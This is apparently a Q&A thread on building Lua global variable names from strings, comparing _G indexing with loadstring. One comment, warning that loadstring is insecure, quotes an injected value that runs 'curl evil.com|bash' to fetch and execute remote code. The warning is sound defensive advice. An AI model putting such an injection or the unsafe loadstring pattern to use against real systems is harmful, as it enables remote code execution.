# Lua string inside variable reference

Tags: lua

Is there any way to "concatenate" variable references with strings?:

```
fat_greek_wedding = 0;
nationality = "greek";

"fat_" .. nationality .. "_wedding" = 1; -- fat_greek_wedding == 1
```

Or perhaps something like:

```
fat_greek_wedding = 0;
nationality = "greek";

fat_(nationality)_wedding = 1; -- fat_greek_wedding == 1
```

FYI I am writing code for Unified Remote, which uses Lua: https://github.com/unifiedremote/Docs

Comment: If one of the answers below helped you then accept it.

Answer (score 7):

Global variables, or fields of structures - are just elements of some table, and variable's name is a text key in that table.

If that `fat_greek_wedding` is a global variable, you can access it like this:

```
fat_greek_wedding = 0;
nationality = "greek";

_G["fat_" .. nationality .. "_wedding"] = 1;
```

Here you explicitly access global environment, altering/creating element by the name that was constructed in run time. Effectively it is the same as running `fat_greek_wedding=1`

Comment: I mean to remember that the `_G` table is not present in all versions of Lua.

Comment: I looked in that git repo, and they reference docs for Lua 5.1, so _G is there in this particular case.

Comment: @HenriMenke `_G` is standard since (at least) 5.0 and this is the canonical way to access global variables by name. (This [was already described in the first edition](https://www.lua.org/pil/14.1.html) of Programming in Lua.)

Answer (score -2):

Try this:

```
loadstring("fat_"..nationality.."_wedding = 1")()
```

Comment: Sadly not, but I did learn something in loadstring nevertheless. Any reason "_wedding = 1" is a section in double quotes? As opposed to "_wedding" = 1.

Comment: @Ron, this example loads and runs new script with the body of `"fat_<actual nationality>_wedding=1"`. Entire string is the script's body, so `= 1` part must appear within string.

Comment: This is potentially insecure (have big fun if the variable name component happens to be `"=0;os.execute'curl evil.com|bash'"`) and vastly more inefficient than the correct way (using `_G`) to do it.

Comment: @nobody Yes, you are right. But I think, in **this** case, when he manually initializes `nationality` variable, this is not insecure.

Comment: @R.Gadeev Yes, but other people will find this by googling, and in their situation this might be important, so a reminder to think of this & validate the interpolated string seems adequate.